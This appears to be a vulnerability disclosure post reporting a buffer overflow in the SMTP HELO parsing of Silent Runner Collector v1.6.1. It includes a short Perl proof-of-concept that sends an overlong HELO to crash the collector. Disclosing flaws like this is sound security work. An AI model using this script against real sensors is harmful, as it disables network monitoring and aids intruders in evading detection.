Hello, Silent Runner Collector (SRC) has a buffer overflow condition in the routines that parse SMTP traffic. SRC is the "sniffer" conponent of the Silent Runner network traffic analysis suite. The overflow was noticed in SRC v1.6.1 but is likely present in other versions as well. The actual buffer in question holds the SMTP HELO line. The overflow occurs when a HELO command in excess of 4096 bytes transits a network segment that the collector is monitoring. This vulnerability can be exploited by an intruder to crash the collector and thus stop the monitoring of transiting network traffic. I'm not sure if this bug can be exploited in such a way as to allow for the execution of code on the sensor. Maybe someone else has some insight into the possibilities for arbitrary code execution? Jack #!/usr/bin/perl # This is a simple script that demonstrates the # SRC HELO overflow vulnerability. It will result # in a crashed silent runner collector so please do # not use it on production networks. It is intended # for demonstration purposes only. use IO::Socket; $remote_host = '192.168.111.3'; $remote_port = 25; $buf = 'A' x 4092; $socket = IO::Socket::INET->new(PeerAddr => $remote_host, PeerPort => $remote_port, Proto => "tcp", Type => SOCK_STREAM) or die "Can't connect to $remote_host:$remote_port : $@\n"; # 'HELO ' + $buf = 4097 bytes ( 1 byte too much) print $socket "HELO $buf"; exit;
